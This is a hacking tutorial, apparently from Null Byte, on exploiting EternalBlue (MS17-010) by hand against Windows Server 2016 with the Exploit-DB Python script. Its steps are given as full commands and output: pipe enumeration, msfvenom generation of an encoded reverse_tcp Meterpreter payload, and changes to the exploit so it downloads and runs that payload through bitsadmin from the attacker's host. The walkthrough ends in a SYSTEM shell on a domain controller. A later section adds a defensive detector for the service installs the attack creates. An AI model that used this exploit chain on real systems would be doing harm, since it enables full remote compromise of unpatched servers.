
How to Use EternalBlue on Windows Server Manually with the MS17-010 Python Exploit « Null Byte :: WonderHowTo



EternalBlue was a devastating exploit that targeted Microsoft's implementation of the SMB protocol. Metasploit contains a useful module that will automatically exploit a target as long as it is vulnerable. But what happens if we want to exploit this vulnerability without Metasploit holding our hand? It can be done with a Python file to exploit EternalBlue manually.

I won't go into the whole spiel about what EternalBlue is, where the exploit came from, or how SMB works, because I already did that in the previous guide on exploiting EternalBlue on Windows Server with Metasploit. So for more background on what EternalBlue and SMB are, and how to find out whether a target is vulnerable, be sure to check that out before continuing.

In this guide, we take the manual path to exploiting EternalBlue on Windows Server. I am using an unpatched copy of Windows Server 2016 Datacenter as the target, and evaluation copies can be obtained from Microsoft if you would like to follow along with each step below.

Step 1: Set Up the Python Exploit

The first thing we need to do is find the exploit file. In Kali, we can use searchsploit in the terminal to search the Exploit-DB database for a match.

  searchsploit eternalblue
  ------------------------------------------------------------------------------------------------------------ ----------------------------------------
   Exploit Title                                                                                              |  Path
                                                                                                              | (/usr/share/exploitdb/)
  ------------------------------------------------------------------------------------------------------------ ----------------------------------------
  Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                    | exploits/windows/remote/42031.py
  Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/42315.py
  Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)          | exploits/windows_x86-64/remote/42030.py
  ------------------------------------------------------------------------------------------------------------ ----------------------------------------
  Shellcodes: No Result
  ------------------------------------------------------------------------------------------------------------ ----------------------------------------
   Paper Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb-papers/)
  ------------------------------------------------------------------------------------------------------------ ----------------------------------------
  How to exploit ETERNALBLUE and DOUBLEPULSAR on Windows 7/2008                                               | docs/english/41896-how-to-exploit-eternalblue-
  How to exploit ETERNALBLUE on Windows Server 2012 R2                                                        | docs/english/42280-how-to-exploit-eternalblue-
  [Spanish] How to exploit ETERNALBLUE and DOUBLEPULSAR on Windows 7/2008                                     | docs/spanish/41897-[spanish]-how-to-exploit
  [Spanish] How to exploit ETERNALBLUE on Windows Server 2012 R2                                              | docs/spanish/42281-[spanish]-how-to-exploit
  ------------------------------------------------------------------------------------------------------------ ----------------------------------------

The exploit we want is the one labeled 42315.py. Let's create a directory to keep it in.

  mkdir exploit

Now we can copy the exploit file to our newly created directory.

  cp /usr/share/exploitdb/exploits/windows/remote/42315.py /root/exploit/

Then change the directory and verify that the file exists.

  cd exploit/
  ls
  42315.py

Now we can look at the source code for more information about this exploit. It is a fairly long file, so we can use the less command to view it from the top.

  less 42315.py
  #!/usr/bin/python
  from impacket import smb, smbconnection
  from mysmb import MYSMB
  from struct import pack, unpack, unpack_from
  import sys
  import socket
  import time

  '''
  MS17-010 exploit for Windows 2000 and later by sleepya

  EDB Note: mysmb.py can be found here ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py

  Note:
  - The exploit should never crash a target (chance should be nearly 0%)
  - The exploit uses the same bug as EternalRomance and EternalSynergy, so a named pipe is needed

  Tested on:
  - Windows 2016 x64
  - Windows 10 Pro Build 10240 x64
  - Windows 2012 R2 x64
  - Windows 8.1 x64
  - Windows 2008 R2 SP1 x64
  - Windows 7 SP1 x64
  - Windows 2008 SP1 x64
  - Windows 2003 R2 SP2 x64
  - Windows XP SP2 x64
  - Windows 8.1 x86
  - Windows 7 SP1 x86
  - Windows 2008 SP1 x86
  - Windows 2003 SP2 x86
  - Windows XP SP3 x86
  - Windows 2000 SP4 x86
  '''

  USERNAME = ''
  PASSWORD = ''

  '''
  Empty transaction:
  - it is allocated from paged pool (same as other transaction types) on Windows 7 and later
  - it is allocated from a private heap (RtlAllocateHeap()) with no one else using it on Windows Vista and earlier
  - no lookaside or caching method for allocating it

  Note: the method name is from the NSA's EternalRomance

  For Windows 7 and later, it is good to use the matched pair method (one is a large pool and another one is fit
  for the freed pool from the large pool). Additionally, the exploit does not need to control transaction
  alignment before doing the OOB write. So this exploit should never crash a target on Windows 7 and later.

  ...

This exploit requires a valid named pipe (we will get to that shortly) and a valid set of credentials. These can be the credentials of any user who has previously logged on to the target, including guest accounts. The exploit will automatically escalate us to a privileged account when it runs.

Before we go any further, it is a good idea to make a copy of this file so that we still have the original source code to refer back to. We can name the copy exploit.py to keep it simple.

  cp 42315.py exploit.py
  ls
  42315.py exploit.py

Now we can edit the Python file and enter a valid username and password for it to use.

  Tested on:
  - Windows 2016 x64
  - Windows 10 Pro Build 10240 x64
  - Windows 2012 R2 x64
  - Windows 8.1 x64
  - Windows 2008 R2 SP1 x64
  - Windows 7 SP1 x64
  - Windows 2008 SP1 x64
  - Windows 2003 R2 SP2 x64
  - Windows XP SP2 x64
  - Windows 8.1 x86
  - Windows 7 SP1 x86
  - Windows 2008 SP1 x86
  - Windows 2003 SP2 x86
  - Windows XP SP3 x86
  - Windows 2000 SP4 x86
  '''

  USERNAME = 'user'
  PASSWORD = 'Password'

  '''
  Empty transaction:
  - it is allocated from paged pool (same as other transaction types) on Windows 7 and later
  - it is allocated from a private heap (RtlAllocateHeap()) with no one else using it on Windows Vista and earlier

Now let's try running the exploit file.

  python exploit.py
  Traceback (most recent call last):
    File "exploit.py", line 3, in <module>
      from mysmb import MYSMB
  ImportError: No module named mysmb

It looks like it is trying to import a module named mysmb, so for this to work, we need to download it. We can easily do that with wget.

  wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
  --2019-03-26 11:25:44--  https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
  Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
  Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: 16669 (16K) [text/plain]
  Saving to: 'mysmb.py'

  mysmb.py      100%[=====================================================================>]  16.28K  --.-KB/s    in 0.03s

  2019-03-26 11:25:44 (528 KB/s) - 'mysmb.py' saved [16669/16669]

Try running the file again and we get a different result.

  python exploit.py
  exploit.py <ip> [pipe_name]

It shows usage information now, which is a good sign. We need to pass the IP address of our target and a pipe name as parameters.

Step 2: Find Named Pipes

Named pipes are a way for running processes to communicate with each other with very little overhead. Pipes usually appear as files that other processes can attach to. Metasploit has a scanner that will find any named pipes on a host. In a new terminal, type msfconsole to launch it, and we can search for the scanner.

  msfconsole
  search pipe
  Matching Modules
  ================

     Name                                            Disclosure Date  Rank       Check  Description
     ----                                            ---------------  ----       -----  -----------
     auxiliary/admin/db2/db2rcmd                     2004-03-04       normal     No     IBM DB2 db2rcmd.exe Command Execution Vulnerability
     auxiliary/admin/smb/ms17_010_command            2017-03-14       normal     Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
     auxiliary/dos/http/nodejs_pipelining            2013-10-18       normal     Yes    Node.js HTTP Pipelining Denial of Service
     auxiliary/dos/windows/smb/ms06_063_trans                         normal     No     Microsoft SRV.SYS Pipe Transaction No Null
     auxiliary/dos/windows/smb/rras_vls_null_deref   2006-06-14       normal     No     Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
     auxiliary/fuzzers/smb/smb_create_pipe                            normal     No     SMB Create Pipe Request Fuzzer
     auxiliary/fuzzers/smb/smb_create_pipe_corrupt                    normal     No     SMB Create Pipe Request Corruption
     auxiliary/scanner/smb/pipe_auditor                               normal     Yes    SMB Session Pipe Auditor
     auxiliary/scanner/smb/pipe_dcerpc_auditor                        normal     Yes    SMB Session Pipe DCERPC Auditor
     exploit/linux/misc/accellion_fta_mpipe2         2011-02-07       excellent  No     Accellion FTA MPIPE2 Command Execution
     exploit/linux/samba/is_known_pipename           2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
     exploit/multi/http/mediawiki_syntaxhighlight    2017-04-06       good       Yes    MediaWiki SyntaxHighlight extension option injection vulnerability
     exploit/multi/svn/svnserve_date                 2004-05-19       average    No     Subversion Date Svnserve

  ...

The one we want is pipe_auditor.

  use auxiliary/scanner/smb/pipe_auditor

Now we can look at the options.

  options
  Module options (auxiliary/scanner/smb/pipe_auditor):

     Name         Current Setting                                                 Required  Description
     ----         ---------------                                                 --------  -----------
     NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
     RHOSTS                                                                       yes       The target address range or CIDR identifier
     SMBDomain    .                                                               no        The Windows domain to use for authentication
     SMBPass                                                                      no        The password for the specified username
     SMBUser                                                                      no        The username to authenticate as
     THREADS      1                                                               yes       The number of concurrent threads

All we really need to do is set the IP address of our target.

  set rhosts 10.10.0.100
  rhosts => 10.10.0.100

And then we can run the scanner.

  run
  [+] 10.10.0.100:445 - Pipes: \netlogon, \lsarpc,
  [*] 10.10.0.100: - Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed

It looks like a few named pipes were found. Awesome.

Step 3: Run the Exploit File

Now we should be able to run the exploit file. Back in the first terminal from Step 1, where we are still in the exploit directory, pass the target's IP address and one of the named pipes we found as parameters.

  python exploit.py 10.10.0.100 netlogon
  Target OS: Windows Server 2016 Standard Evaluation 14393
  Target is 64 bit
  Got frag size: 0x20
  GROOM_POOL_SIZE: 0x5030
  GROOM_TRANS_SIZE: 0xf90
  CONNECTION: 0xffff928c5dc1e020
  SESSION: 0xffffac016815e210
  FLINK: 0xffffac0167062098
  InParam: 0xffffac016705c16c
  MID: 0x3303
  success controlling groom transaction
  modify trans1 struct for arbitrary read/write
  make this SMB session to be SYSTEM
  overwriting session security context
  creating file c:\pwned.txt on the target
  Done

We can see some data spit out on the screen, and at the bottom it says it created a text file on the target. Looking at the target, we can see that this was successful.

But we want to do more than just create a text file on the target. This is only a proof of concept, after all, so we have to do some more work to fully exploit this vulnerability.

Step 4: Prepare the Payload

We need a payload and a way for the exploit to retrieve and execute it. For that, we can use MSFvenom to generate some shellcode, and we can serve it from our machine with Apache.

In a new terminal, use the following command to generate the payload and save it to a file named sc.exe in the default Apache web root.

  msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=10.10.0.1 lport=4321 -e x64/xor -i 5 -f exe -o /var/www/html/sc.exe
  Found 1 compatible encoders
  Attempting to encode payload with 5 iterations of x64/xor
  x64/xor succeeded with size 551 (iteration=0)
  x64/xor succeeded with size 591 (iteration=1)
  x64/xor succeeded with size 631 (iteration=2)
  x64/xor succeeded with size 671 (iteration=3)
  x64/xor succeeded with size 711 (iteration=4)
  x64/xor chosen with final size 711
  Payload size: 711 bytes
  Final size of exe file: 7168 bytes
  Saved as: /var/www/html/sc.exe

This is a long command, so let's break it down:

  • The -a flag sets the architecture to 64-bit.
  • The --platform option specifies the platform as Windows.
  • The -p flag specifies the payload.
  • lhost is our local machine.
  • lport is the local port the target will connect back to.
  • The -e flag specifies the encoder to use.
  • The -i flag specifies the number of iterations the encoder runs.
  • The -f flag specifies the output format.
  • The -o flag specifies the output file.

Now we can start the Apache server so that the exploit can connect back to our machine from the target to retrieve the payload. Next, we will tweak the code to suit our needs.

  service apache2 start

Step 5: Modify the Code

Back in exploit.py, find the section of code near the bottom that looks like this:

  def smb_pwn(conn, arch):
      smbConn = conn.get_smbconnection()

      print('creating file c:\\pwned.txt on the target')
      tid2 = smbConn.connectTree('C$')
      fid2 = smbConn.createFile(tid2, '/pwned.txt')
      smbConn.closeFile(tid2, fid2)
      smbConn.disconnectTree(tid2)

      #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
      #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
      # Note: there are many methods to get a shell over the SMB admin session
      # a simple method to get a shell (but easily detected by AV) is
      # executing a binary generated by "msfvenom -f exe-service ..."

  def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
      with open(localSrc, 'rb') as fp:
          smbConn.putFile(remoteDrive + '$', remotePath, fp.read)

Here we can see the code responsible for connecting to the target and creating the text file. We can also see an interesting-looking function called service_exec() that is commented out. It connects to the target and issues a command to copy the previously created text file to a new text file named pwned_exec.txt on the C drive.

First, uncomment that function call and replace everything after cmd /c with the following command:

  bitsadmin /transfer pwn /download http://10.10.0.1/sc.exe C:\sc.exe

BITSAdmin (Background Intelligent Transfer Service) is a Windows command-line tool used to upload or download files. The /transfer switch initiates a transfer job (named pwn in this case), and /download indicates that it is a download. Then we give the name of the remote file (which is on our machine) and the local path the file will be saved to once it is transferred.

Then add another service_exec() call to run the executable we just transferred. The code will look like this:

  service_exec(conn, r'cmd /c c:\sc.exe')

Finally, we can comment out the section that creates the text file, because we really don't need it any longer. The final code should look like this:

  def smb_pwn(conn, arch):
      smbConn = conn.get_smbconnection()

      #print('creating file c:\\pwned.txt on the target')
      #tid2 = smbConn.connectTree('C$')
      #fid2 = smbConn.createFile(tid2, '/pwned.txt')
      #smbConn.closeFile(tid2, fid2)
      #smbConn.disconnectTree(tid2)

      #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
      service_exec(conn, r'cmd /c bitsadmin /transfer pwn /download http://10.10.0.1/sc.exe C:\sc.exe')
      service_exec(conn, r'cmd /c c:\sc.exe')
      # Note: there are many methods to get a shell over the SMB admin session
      # a simple method to get a shell (but easily detected by AV) is
      # executing a binary generated by "msfvenom -f exe-service ..."

  def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
      with open(localSrc, 'rb') as fp:
          smbConn.putFile(remoteDrive + '$', remotePath, fp.read)

Now all that is left to do is run the exploit.

Step 6: Run the Finished Exploit

To complete the exploitation, we need something to catch the shell when the payload executes. We can use Metasploit's multi/handler for this. In a new terminal, use the following commands.

  msfconsole
  use exploit/multi/handler

You should see the "exploit(multi/handler)" prompt. We just need to set the payload to match what we specified when we created the shellcode earlier, which in this case is a reverse TCP Meterpreter shell.

  set payload windows/x64/meterpreter/reverse_tcp
  payload => windows/x64/meterpreter/reverse_tcp

Then set the listening host.

  set lhost 10.10.0.1
  lhost => 10.10.0.1

And the listening port.

  set lport 4321
  lport => 4321

And we can start the handler.

  run
  [*] Started reverse TCP handler on 10.10.0.1:4321

It will listen for incoming connections, and if everything goes smoothly, we will get a Meterpreter session when our exploit completes.

Finally, we should have everything in place and ready to go. We can launch the exploit just as we did earlier in our test run, from the exploit directory.

  python exploit.py 10.10.0.100 netlogon
  Target OS: Windows Server 2016 Standard Evaluation 14393
  Target is 64 bit
  Got frag size: 0x20
  GROOM_POOL_SIZE: 0x5030
  GROOM_TRANS_SIZE: 0xf90
  CONNECTION: 0xffff928c5dc48020
  SESSION: 0xffffac0165773250
  FLINK: 0xffffac0167056098
  InParam: 0xffffac016705016c
  MID: 0x2a07
  success controlling groom transaction
  modify trans1 struct for arbitrary read/write
  make this SMB session to be SYSTEM
  overwriting session security context
  Opening SVCManager on 10.10.0.100.....
  Creating service Jepa.....
  Starting service Jepa.....
  SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
  Removing service Jepa.....
  Opening SVCManager on 10.10.0.100.....
  Creating service YTXT.....
  Starting service YTXT.....
  The NETBIOS connection with the remote host timed out.
  Removing service YTXT.....
  ServiceExec Error on: 10.10.0.100
  nca_s_proto_error
  Done

This time, we should see different results. Ignore the errors, and if it doesn't work the first time, just try again. When the exploit completes, we should see a session open up on our listener.

  [*] Sending stage (206403 bytes) to 10.10.0.100
  [*] Meterpreter session 1 opened (10.10.0.1:4321 -> 10.10.0.100:51057) at 2019-03-26 11:49:38 -0500

  meterpreter >

We can verify that we have compromised the target with the sysinfo command.

  sysinfo
  Computer        : DC01
  OS              : Windows 2016 (Build 14393).
  Architecture    : x64
  System Language : en_US
  Domain          : DLAB
  Logged On Users : 4
  Meterpreter     : x64/windows

And the getuid command.

  getuid
  Server username: NT AUTHORITY\SYSTEM

And there we have it - a full Meterpreter session from manual exploitation of EternalBlue.
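Seen from the target, each service_exec() call in the modified exploit is an ordinary service install: the command string becomes the service's binary path under a random four-letter name (Jepa and YTXT in the output above), and Windows records that in the System log as event 7045. The following is an added detection example written for this article, not code from the exploit or from Null Byte; the 7045 lines are constructed, and their pipe-delimited one-line shape is an assumption about how the log export was flattened.

```python
import re

# Constructed sample of Windows System log event 7045 ("A service was installed
# in the system"), flattened to one line per event as
# EventID|ServiceName|ServiceFileName|ServiceType|StartType|Account.
# The first two lines mirror what the exploit's service_exec() leaves behind;
# the last two are ordinary Windows services for contrast.
SAMPLE_7045 = [
    "7045|Jepa|cmd /c bitsadmin /transfer pwn /download http://10.10.0.1/sc.exe C:\\sc.exe|user mode service|demand start|LocalSystem",
    "7045|YTXT|cmd /c C:\\sc.exe|user mode service|demand start|LocalSystem",
    "7045|Spooler|C:\\Windows\\System32\\spoolsv.exe|user mode service|auto start|LocalSystem",
    "7045|W32Time|C:\\Windows\\system32\\svchost.exe -k LocalService|user mode service|auto start|LocalService",
]

# A real service binary implements the service control protocol; a cmd /c
# one-liner registered as the image path is the signature of command execution
# through the Service Control Manager (this is why the exploit output above
# reports ERROR_SERVICE_REQUEST_TIMEOUT: cmd never calls SetServiceStatus).
SHELL_LAUNCHER = re.compile(r"^(?:%COMSPEC%|cmd(?:\.exe)?)\s+/[ck]\b", re.IGNORECASE)
BITS_DOWNLOAD = re.compile(r"bitsadmin\b.*?/download\b.*?https?://", re.IGNORECASE)
RANDOM_NAME = re.compile(r"^[A-Za-z]{4}$")  # impacket-style random service name


def parse_7045(line):
    """Split a flattened 7045 line into its fields; return None for other events."""
    parts = line.split("|")
    if len(parts) != 6 or parts[0] != "7045":
        return None
    return {"name": parts[1], "image": parts[2], "type": parts[3],
            "start": parts[4], "account": parts[5]}


def score_service_install(ev):
    """Return the list of suspicious traits found in one 7045 event."""
    reasons = []
    if SHELL_LAUNCHER.search(ev["image"]):
        reasons.append("image path is a cmd /c one-liner, not a service binary")
    if BITS_DOWNLOAD.search(ev["image"]):
        reasons.append("bitsadmin /download from an HTTP URL in the service path")
    if RANDOM_NAME.match(ev["name"]):
        reasons.append("four-letter service name (impacket-style random name)")
    # Only worth mentioning when something else already looks wrong; many
    # legitimate services are demand-start LocalSystem too.
    if reasons and ev["account"] == "LocalSystem" and ev["start"] == "demand start":
        reasons.append("demand-start service running as LocalSystem")
    return reasons


def find_suspicious_installs(lines, min_reasons=2):
    """Return (service_name, reasons) for 7045 events with at least min_reasons hits."""
    hits = []
    for line in lines:
        ev = parse_7045(line)
        if ev is None:
            continue
        reasons = score_service_install(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev["name"], reasons))
    return hits
```

Run against the constructed sample, only the two exploit-created services (Jepa, YTXT) are returned; the Spooler and W32Time installs score nothing.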

Wrapping Up

In this guide, we covered how to manually exploit EternalBlue on Windows Server. We started by setting up a few things to get the proof of concept working. Then we generated some shellcode and hosted the payload on our machine. Next, we modified the code, launched the exploit, and ended up with a Meterpreter session on the target. Although Metasploit contains a module that does all of this automatically, it is beneficial to know how to do things the hard way, in case something needs to be adapted for a particular target or scenario.

Cover image by Pixabay/Pexels; screenshots by drd_/Null Byte
